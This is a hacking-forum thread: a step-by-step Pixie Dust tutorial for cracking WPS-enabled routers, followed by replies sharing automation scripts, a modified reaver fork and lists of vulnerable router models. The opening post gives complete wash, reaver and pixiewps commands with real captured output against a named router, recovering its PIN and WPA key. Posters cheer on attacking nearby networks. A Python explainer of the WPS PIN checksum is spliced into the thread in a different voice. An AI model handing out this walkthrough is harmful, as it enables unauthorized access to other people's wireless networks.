EvilZone


: Using pixiewps on vulnerable chipset routers
: iTpHo3NiX April 07, 2015, 06:04:24 AM

Title: Using pixiewps on vulnerable chipset routers
Author: DeepCopy
Website: EvilZone.ORG

Disclaimer:
I do not advocate hacking of wireless networks that are not your own. This is for information purposes only. The following guide is an attack on a default Comcast setup that has WPS enabled by default with a secure WPA2 passphrase that a neighbor allowed me to attempt to break into.

Copy/Pasting:
You are welcome to copy and paste this tutorial, however I would appreciate a link to this OP, leaving my name and source website intact along with my credits.

Credits:
Evilzone - For existing, thanks ande and staff
FurqanHanif - For linking to the original information, getting me looking at the pixiedust exploit
Dominique Bongard - For discovering the vulnerability
reaver - The developers of reaver and also the guy that modified it for use with pixiewps
wiire - For creating pixiewps
soxrok2212 - For his youtube vid - https://www.youtube.com/watch?v=8f6oClT7Wp4

Please note this is just my walkthrough of following the steps as in the video. I prefer text tutorials to video tutorials, however if you prefer video tutorials just watch soxrok2212's video on the pixiewps attack.

Updating Reaver and Installing PixieWPS:

Kali has now included the modified reaver and pixiewps in their repos, so it just got much easier to set up and install:

apt-get update
apt-get install reaver
apt-get install pixiewps

Finding WPS enabled routers

So in a live attack, you're not going to know what routers are vulnerable, what routers have WPS enabled, etc. That's ok.

Let's set up our monitor mode interface:
airmon-ng start wlan0
To find WPS enabled routers we are going to use the wash command:
wash -i mon0 -C
Press ctrl+c to stop the wash command.

Now we get to see WPS enabled routers. Now I know that the newer Comcast routers have a default setup of HOME-#### and these are Arris routers running on a Ralink chipset. These are nice and simple. So in this example I am going to be targeting a HOME-#### router.

Running reaver to collect data

Ok so now we need to collect the data to use pixiewps. So I chose my target:
ESSID: HOME-2128
BSSID: C4:39:3A:4B:21:28
Channel: 1

Let's get our info:
reaver -i mon0 -c 1 -b C4:39:3A:4B:21:28 -vv -S
We run reaver for a complete transaction and stop it by pressing ctrl+c.

After running it, this is what we get:

Reaver v1.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 1
[+] Waiting for beacon from C4:39:3A:4B:21:28
[+] Associated with C4:39:3A:4B:21:28 (ESSID: HOME-2128)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 68:94:9d:e8:c5:22:db:e0:b3:af:5d:6e:0b:3e:4e:80
[P] PKE: 83:ab:bf:00:56:2a:fc:d5:f9:ca:60:d0:e1:c4:11:e3:fe:97:0e:b3:9d:37:48:82:31:15:db:ea:0f:64:86:6a:e1:12:35:12:6f:c3:57:3d:5f:d6:5f:31:83:12:62:b4:ac:06:e7:c1:2c:3f:66:ac:54:2e:3a:54:44:66:ca:e2:65:b5:71:d9:c7:d5:67:2b:50:9e:6e:db:8b:39:31:bb:51:d7:9f:fc:39:52:57:2d:69:16:c0:40:06:0f:e0:84:e6:bb:e7:df:86:b4:7a:7c:68:f0:70:ff:37:01:1b:b5:98:be:ee:48:a8:08:26:7c:75:2f:25:2f:60:9a:87:f5:33:f1:e5:50:20:45:7d:6c:ef:fd:c1:3e:b1:00:7d:24:55:82:e6:29:78:3b:d6:03:2f:cd:e2:0a:b3:9d:0f:d4:c0:62:50:16:24:fe:ca:19:c7:3e:0a:52:64:06:bf:10:c7:0e:e3:4a:b4:17:45:3b:8d:47:de:4e:ce:8f:4f:5c
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[+] Received M1 message
[P] AuthKey: a0:22:62:16:a8:0c:36:bd:aa:40:4a:c5:96:af:1a:c8:3d:4e:89:ba:be:b5:4b:ba:fe:36:9d:99:46:0f:c4:3e
[+] Sending M2 message
[P] E-Hash1: de:20:e2:b2:74:98:00:6b:9f:8b:12:fc:9e:fb:d5:5c:81:0c:e1:00:22:60:2e:70:02:0d:8d:b5:45:be:3f:24
[P] E-Hash2: 42:30:50:cb:1f:67:f0:70:f5:0e:a0:8e:71:bb:4a:0d:d4:c6:03:f9:9f:47:1c:05:82:52:64:20:c4:03:3d:5b
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 1

So now if you are not receiving the E-Hashes you need to be closer to the access point. Simply get off your ass and move lmfao

Now I'm not even going to bother looking this up on WikiDevi because it simply says Ralink, we're good. However if you're unsure, look up the model and manufacturer on WikiDevi, or google them along with "wikidevi" to get the page.

Now that we've received this message, we are ready to get the pin. Yes, you heard right, we're already done; the rest is just plugging in the correct values.

Using pixiewps to get the Pin

Usage: pixiewps <arguments>

 Required Arguments:

    -e, --pke      : Enrollee public key
    -r, --pkr      : Registrar public key
    -s, --e-hash1  : E-Hash1
    -z, --e-hash2  : E-Hash2
    -a, --authkey  : Key used in HMAC SHA-256

 Optional Arguments:

    -n, --e-nonce  : Enrollee nonce
    -S, --dh-small : Small Diffie-Hellman keys (--pkr not needed)

So it's easy from here, just copy the data over:

pixiewps -e PKE -s EHASH1 -z EHASH2 -a AUTHKEY -S
On Broadcom chipsets, include the -n argument and the E-Nonce to get the pin.

So with the following access point we punch in the values, and our command looks like so:
pixiewps -e 83:ab:bf:00:56:2a:fc:d5:f9:ca:60:d0:e1:c4:11:e3:fe:97:0e:b3:9d:37:48:82:31:15:db:ea:0f:64:86:6a:e1:12:35:12:6f:c3:57:3d:5f:d6:5f:31:83:12:62:b4:ac:06:e7:c1:2c:3f:66:ac:54:2e:3a:54:44:66:ca:e2:65:b5:71:d9:c7:d5:67:2b:50:9e:6e:db:8b:39:31:bb:51:d7:9f:fc:39:52:57:2d:69:16:c0:40:06:0f:e0:84:e6:bb:e7:df:86:b4:7a:7c:68:f0:70:ff:37:01:1b:b5:98:be:ee:48:a8:08:26:7c:75:2f:25:2f:60:9a:87:f5:33:f1:e5:50:20:45:7d:6c:ef:fd:c1:3e:b1:00:7d:24:55:82:e6:29:78:3b:d6:03:2f:cd:e2:0a:b3:9d:0f:d4:c0:62:50:16:24:fe:ca:19:c7:3e:0a:52:64:06:bf:10:c7:0e:e3:4a:b4:17:45:3b:8d:47:de:4e:ce:8f:4f:5c -s de:20:e2:b2:74:98:00:6b:9f:8b:12:fc:9e:fb:d5:5c:81:0c:e1:00:22:60:2e:70:02:0d:8d:b5:45:be:3f:24 -z 42:30:50:cb:1f:67:f0:70:f5:0e:a0:8e:71:bb:4a:0d:d4:c6:03:f9:9f:47:1c:05:82:52:64:20:c4:03:3d:5b -a a0:22:62:16:a8:0c:36:bd:aa:40:4a:c5:96:af:1a:c8:3d:4e:89:ba:be:b5:4b:ba:fe:36:9d:99:46:0f:c4:3e -S

Press enter and this is our output:
[*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
 [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
 [*] PSK1: 10:c4:31:46:20:a9:40:fb:c0:2b:e0:c5:13:94:9b:50
 [*] PSK2: 87:6d:5d:f8:cb:08:22:3b:f8:73:80:85:c1:5d:95:ee
 [+] WPS pin: 49236880

 [*] Time taken: 0 s

If it says "WPS pin not found", this is a non-vulnerable router.

Now we use reaver to get the key:
reaver -i mon0 -c 1 -b C4:39:3A:4B:21:28 -vv -S --pin=49236880
Congratulations. You just cracked a router in under 3 minutes.

Please post any routers and chipsets you've tried so we can work on compiling a list of working and non-working chipsets.
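The reaver output above reports "Max pin attempts: 11000" and pixiewps returns the PIN 49236880; both numbers follow from the WPS PIN format, in which the last digit is a checksum and the registrar proves the two halves separately (E-Hash1 commits to PSK1, derived from the first four digits, and E-Hash2 to PSK2, derived from the last four), so an online search never has to cover more than 10^4 + 10^3 candidates. The following Python is an added example, not code from the original post or from the reaver/pixiewps projects, and checks that format against the PINs shown in this thread.

```python
import re

# Constructed sample input: the two PINs that appear in the reaver/pixiewps output above.
SAMPLE_PINS = ["12345670", "49236880"]


def wps_checksum(first_seven: int) -> int:
    """Return the checksum digit the WPS spec appends to a 7-digit PIN body."""
    accum = 0
    n = first_seven
    while n:
        accum += 3 * (n % 10)   # odd positions (from the right) weigh 3
        n //= 10
        accum += n % 10         # even positions weigh 1
        n //= 10
    return (10 - accum % 10) % 10


def complete_pin(first_seven: int) -> str:
    """Append the checksum digit to a 7-digit PIN body, giving the 8-digit PIN."""
    return f"{first_seven:07d}{wps_checksum(first_seven)}"


def is_valid_pin(pin: str) -> bool:
    """True if pin is exactly 8 digits and its last digit is the correct checksum."""
    if not re.fullmatch(r"\d{8}", pin):
        return False
    return wps_checksum(int(pin[:7])) == int(pin[7])


def split_pin(pin: str) -> tuple:
    """Split a PIN into the parts the registrar verifies separately.

    The first half (4 digits) is what E-Hash1/PSK1 commit to; the second half is
    3 free digits plus the checksum, which is what E-Hash2/PSK2 commit to.
    """
    return pin[:4], pin[4:7], pin[7]


def pin_search_space() -> int:
    """Worst-case online attempts: 10^4 first halves, then 10^3 second halves.

    This is the 11000 that reaver prints as 'Max pin attempts'; the checksum
    removes the last digit from the search, and the halves are confirmed
    independently (the WSC NACK after M4 above means the first half was wrong).
    """
    return 10**4 + 10**3


def check_sample_pins() -> dict:
    """Validate every constructed sample PIN and return the results by PIN."""
    return {pin: is_valid_pin(pin) for pin in SAMPLE_PINS}


if __name__ == "__main__":
    for pin, ok in check_sample_pins().items():
        print(pin, split_pin(pin), "valid checksum" if ok else "INVALID")
    print("online search space:", pin_search_space())
```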
: Re: Using pixiewps on Ralink chipset routers
: v32itas April 07, 2015, 07:32:46 AM
You definitely deserve a cookie. Currently I have no time to try dis pixie dust attack, but it was nice to look into this.
: Re: Using pixiewps on Ralink chipset routers
: iTpHo3NiX April 07, 2015, 07:39:48 AM
> You definitely deserve a cookie. Currently I have no time to try dis pixie dust attack, but it was nice to look into this.

Yeah I was a little skeptical, but damn this is easy... shits all over the WEP attack. Literally takes no time at all. Going to have to break out the MiTM attacks, this is just too easy I almost feel sad...
: Re: Using pixiewps on Ralink chipset routers
: Evox April 07, 2015, 08:26:02 AM
Nicely written & very cool.

Haven't done any wifi cracking in a long while so its cool to see this.

Thanks for the share!
: Re: Using pixiewps on Ralink chipset routers
: iTpHo3NiX April 07, 2015, 02:11:34 PM

I kinda felt the same way. Seems like roughly about 50-60% of the APs around here are vulnerable to this. Add in WEP and those who have phone numbers for their passwords set by the service providers and it's literally open season on routers :D

There has been a python script released which automates the process and makes it even easier:

https://github.com/nxxxu/AutoPixieWps

True story. Reminds me of airoscript.

Looking at this line:
call(["reaver", "-i", interface, "-c", channel, "-b", bssid, "-vv", "-S", WPSpin])
I think
"--pin=",WPSpin
needs to be added.
: Re: Using pixiewps on Ralink chipset routers
: v32itas April 07, 2015, 06:35:49 PM
found this
https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?pli=1#gid=2048815923

on
https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)

gonna add my own findings soon (maybe)
: Re: Using pixiewps on Ralink chipset routers
: iTpHo3NiX April 08, 2015, 03:59:37 AM
> found this
> https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?pli=1#gid=2048815923
>
> on
> https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)
>
> gonna add my own findings soon (maybe)

I can't update it. The Netgear R6300 v1 is on the list; I wanted to add that the v2 is also not exploitable (Broadcom chipset).
https://wikidevi.com/wiki/Netgear_R6300_v2
: Re: Using pixiewps on Ralink chipset routers
: 0E 800 April 08, 2015, 08:51:02 PM
@deepcopy - I modified with "--pin=" but still shows same info.

Would like for it to append info to a database and really automate.

Script is more of a copy-paste helper tool.

BTW - my tests so far:

Confirmed working on Belkin F7D5301 v2.

Not working on Linksys E2500 v2.
: Re: Using pixiewps on Ralink chipset routers
: iTpHo3NiX April 09, 2015, 12:42:15 AM
> @deepcopy - I modified with "--pin=" but still shows same info.
>
> Would like for it to append info to a database and really automate.
>
> Script is more of a copy-paste helper tool.
>
> BTW - my tests so far:
>
> Confirmed working on Belkin F7D5301 v2.
>
> Not working on Linksys E2500 v2.

Maybe we need to develop an evilzone script to automate and have it send info to a database that can be viewed. Should be fairly simple to do in bash. I haven't written a bash script in a while, could be a fun easy project.
: Re: Using pixiewps on Ralink chipset routers
: iTpHo3NiX April 09, 2015, 03:09:14 AM
So instead for the setup do

apt-get update
apt-get install reaver
apt-get install pixiewps

updated OP, no longer need to compile reaver and pixiewps

just tested against my router
ASUS RT-AC68R is not vulnerable. I still don't use WPS anyways though :P

Not Vulnerable:
Netgear R7000 - Broadcom BCM4709A0

Linksys WRT160Nv2 - Vulnerable (Ralink RT2880 - https://wikidevi.com/wiki/Linksys_WRT160N_v2 )
: Re: Using pixiewps on vulnerable chipset routers
: t6_x April 13, 2015, 01:20:08 AM

Hello

I made a modification to reaver so that it does the Pixie Dust attack when testing a PIN number.

Here's my contribution

GitHub
https://github.com/t6x/reaver-wps-fork-t6x

Example
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>


[+] Switching mon0 to channel 1
[?] Restore previous session for A.:9.:D.:....:....:...? [n/Y] n
[+] Waiting for beacon from A.:9.:D.:....:....:...
[+] Associated with A.:9.:D.:....:....:.... (ESSID: ......)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c6:66:a6:72:37:6d:........
[P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:........
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:........
[P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:.......
[+] Sending M2 message
[P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
[P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
[Pixie-Dust]
[Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] PSK1: dd:09:bd:24:..........
[Pixie-Dust]   [*] PSK2: 77:e0:dd:00:........
[Pixie-Dust]   [+] WPS pin: 9178....
[Pixie-Dust]
[Pixie-Dust]   [*] Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...


[Reaver Test] BSSID: A.:9.:D.:3.:..:..
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '9178....'
[Reaver Test] [+] WPA PSK: '112233'
[Reaver Test] [+] AP SSID: '....'

Any problem or suggestion, please contact me.
: Re: Using pixiewps on vulnerable chipset routers
: iTpHo3NiX April 13, 2015, 02:26:36 AM
Looks good, saw your modified reaver on Kali forums, thanks for the share!
: Re: Using pixiewps on vulnerable chipset routers
: ptales July 21, 2015, 07:45:39 PM
Hey guys,

somehow I seem to be having problems with the monitor mode. After running airmon-ng start wlan0, it says monitor mode was enabled. When running wash -i mon0 -C, however, it says:
[X] ERROR: Failed to open 'mon0' for capturing
Trying to run reaver (with my router's MAC address) produces this:
[+] Switching mon0 to channel 1
[-] Failed to initialize interface 'mon0'
[-] Failed to recover WPA key
[+] Nothing done, nothing to save.
So it's obvious that something isn't right with my monitor mode, I just can't figure out what it is. I've been trying this for the past few days but always get the same error. When running ifconfig (after enabling monitor mode), I cannot find anything named "mon0". When running iwconfig, though, I get this:
mon0      IEEE 802.11abgn  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=15 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
Hope my post isn't too dumb; as you can see, I'm quite new to this. If any other information is required to help me, please let me know.


Kind regards
ptales
: Re: Using pixiewps on vulnerable chipset routers
: 0E 800 July 21, 2015, 08:22:27 PM
Review:
https://www.kali.org/penetration-testing/pixiewps-reaver-aircrack-ng-updates/

Most likely the name of your monitor interface is NOT mon0.

airmon-ng start wlan0
airmon-ng

(look for your monitor interface name, verify if it's mon0)
: Re: Using pixiewps on vulnerable chipset routers
: ptales July 21, 2015, 08:57:32 PM
My monitor interface's name is mon0, I checked that, of course. When running airmon-ng start wlan0, it says "(monitor mode enabled on mon0)". When running "airmon-ng", it says
Interface Chipset Driver
mon0 Unknown iwlwifi - [phy0]
wlan0 Unknown iwlwifi - [phy0]
This does mean "mon0" is correct, doesn't it? Thanks for your reply! :)
: Re: Using pixiewps on vulnerable chipset routers
: 0E 800 July 21, 2015, 10:08:28 PM
Does your Intel chipset support packet injection?

This is a basic test to determine if your card successfully supports injection.
aireplay-ng -9 wlan0
Review:
http://www.aircrack-ng.org/doku.php?id=injection_test
: Re: Using pixiewps on vulnerable chipset routers
: iTpHo3NiX July 21, 2015, 10:46:32 PM
If you're using the latest version of aircrack suite 1.2 rc2+ airmon-ng puts the interface up as wlan0mon. You should probably check my updated tutorial. The link is in my signature
: Re: Using pixiewps on vulnerable chipset routers
: ptales July 22, 2015, 05:02:06 AM
0E 800 found the problem, I guess =\
This is what aireplay-ng -9 wlan0 returns:
ioctl(SIOCSIWMODE) failed: Device or resource busy

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.  Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.
: Re: Using pixiewps on vulnerable chipset routers
: iTpHo3NiX July 22, 2015, 03:22:18 PM
ptales,

What WiFi chipset do you have? You may need to use different drivers, can't help much if you don't have the right drivers.

You need to start airmon-ng interface# then run aireplay on the monitor interface to see if injection is supported
: Re: Using pixiewps on vulnerable chipset routers
: ptales July 22, 2015, 05:21:44 PM
My WLAN card is the Intel Centrino Advanced-N 6235 and all I could find regarding the chipset is that it uses a chipset from the Intel 7 series (I guess it's the Q77). The driver is iwlwifi. Running aireplay on the monitor interface returns "name not unique on network" - running it on wlan0, as suggested by 0E 800, works (see below). I hope this information is usable (and I'm not behaving completely dumb).

Again, thanks for your replies! :)
: Re: Using pixiewps on vulnerable chipset routers
: 0E 800 July 22, 2015, 07:26:15 PM
Get yourself one of these to play with:

http://www.amazon.com/Alfa-Awus036H-Upgraded-Long-Rang-Panel/dp/B003YHYIT0/ref=sr_1_2?s=electronics&ie=UTF8&qid=1437585931&sr=1-2&keywords=AWUS036H

: Re: Using pixiewps on vulnerable chipset routers
: ptales July 22, 2015, 08:06:56 PM
Thought about getting one of them for quite a while now and I guess now I'll finally do it. Thanks for the link! :)
: Re: Using pixiewps on vulnerable chipset routers
: proxx July 23, 2015, 03:58:55 PM
Worst card ever.
: Re: Using pixiewps on vulnerable chipset routers
: ptales July 23, 2015, 04:29:26 PM
Yeah, this machine was a gift so I couldn't choose ;)


My Alfa AWUS036H should arrive tomorrow, anyway! :)
: Re: Using pixiewps on vulnerable chipset routers
: 0E 800 July 23, 2015, 06:40:43 PM
> Worst card ever.

036h? That thing has been steady workhorse for me. I would appreciate if you would recommend a better model for wifi auditing.
: Re: Using pixiewps on vulnerable chipset routers
: ptales July 23, 2015, 06:43:15 PM
I thought he meant my Intel Centrino? Heard only great things about the Alfa so far. If you, proxx, indeed meant the Alfa, are you sure you used an original? People say there are tons of fakes out there.
: Re: Using pixiewps on vulnerable chipset routers
: proxx July 23, 2015, 10:50:34 PM
It's the most unstable piece of shit out there, let alone the drivers, which are way worse.
To blast some deauths over the airwaves is cute but shit ... a stable connection is almost impossible to achieve with this card.
: Re: Using pixiewps on vulnerable chipset routers
: 0E 800 July 23, 2015, 11:17:35 PM
What card would you recommend as an alternative?

Thanks 0pt1musPr1m3

This one has same chipset, might be worth trying.
http://www.amazon.com/dp/B00EFLKNJI?psc=1


Staff Note: No double posting
: Re: Using pixiewps on vulnerable chipset routers
: proxx July 24, 2015, 12:24:17 AM
Hunt for Atheros, out of the box mon mode supported by Atheros, what more do you need.
Most stable shit ever and just works, I have one of those PCI cards around that is awesome but also I obtained a bunch of high end PCI mini or whatever it is called, Atheros chips, these things can pump out 1 watt if it is power you are horny for, I prefer modules that are stable but these seem to do both (for those who don't get the hint, you can put it in your laptop............really??yes)
I promise I will check the labels and post details if anyone cares (Ubiquiti iirc)
There are Alfa cards out there with such chips.

I had a bunch of those rtl 'uberhaxxorcards', they all sorta died on me trying to download a file which is nearly impossible.
They get hot for no reason, I had 1 replaced etc, don't get me fucking started on Alfa ffs.
Tried different antennas, distance, you name it I tried it.
Even used windows to see if it would matter the slightest, I'm pretty sure it's worse.

THE DRIVERS BLOW, just saying.
: Re: Using pixiewps on vulnerable chipset routers
: iTpHo3NiX July 24, 2015, 01:03:22 AM
I'm going to have to agree with ProxX, Atheros is my favorite, I love the ath9k drivers, stability and performance. Always had stability issues with rtl chipset cards
: Re: Using pixiewps on vulnerable chipset routers
: ptales July 28, 2015, 12:29:33 PM
Sorry for my late reply, was busy the last days.
My Alfa arrived and all problems I had are solved, just didn't find a vulnerable chipset router yet. Thanks for all the helpful answers I received! I've now started reading some eBooks regarding wireless penetration testing.
: Re: Using pixiewps on vulnerable chipset routers
: iTpHo3NiX July 28, 2015, 05:08:20 PM
> Sorry for my late reply, was busy the last days.
> My Alfa arrived and all problems I had are solved, just didn't find a vulnerable chipset router yet. Thanks for all the helpful answers I received! I've now started reading some eBooks regarding wireless penetration testing.

Read through my updated tutorial:
https://evilzone.org/tutorials/wireless-auditing-with-kali-linux-aircrack-ng-reaver-and-pixiewps

That method works on more models. This one is pretty much for Ralink and a few Broadcom chipset routers. The -S argument limits the amount of vulnerable routers. It's just much quicker bruteforcing vulnerable routers.
: Re: Using pixiewps on vulnerable chipset routers
: ptales July 28, 2015, 10:31:03 PM
Thanks for the link, will definitely read through that tutorial! You're really being a great help! :)
: Re: Using pixiewps on vulnerable chipset routers
: tommymaymay September 17, 2015, 12:05:12 PM
I managed to get it done, and I'm sharing the AP I tried it on:

[P] WPS Manufacturer: Sitecom Europe BV
[P] WPS Model Name: Wireless Access Point 300N
[P] WPS Model Number: Wireless Access Point 300N

: Re: Using pixiewps on vulnerable chipset routers
: proxx September 17, 2015, 12:44:26 PM
> I managed to get it done, and I'm sharing the AP I tried it on:
>
> [P] WPS Manufacturer: Sitecom Europe BV
> [P] WPS Model Name: Wireless Access Point 300N
> [P] WPS Model Number: Wireless Access Point 300N
Would help if you post the first xx:xx:xx:xx of the BSSID.
Also thanks for sharing with us.
: Re: Using pixiewps on vulnerable chipset routers
: tommymaymay September 17, 2015, 12:47:46 PM
> Would help if you post the first xx:xx:xx:xx of the BSSID.
> Also thanks for sharing with us.

[P] WPS Manufacturer: Sitecom Europe BV
[P] WPS Model Name: Wireless Access Point 300N
[P] WPS Model Number: Wireless Access Point 300N
BSSID: 00:0C:F6:87

There you go ;)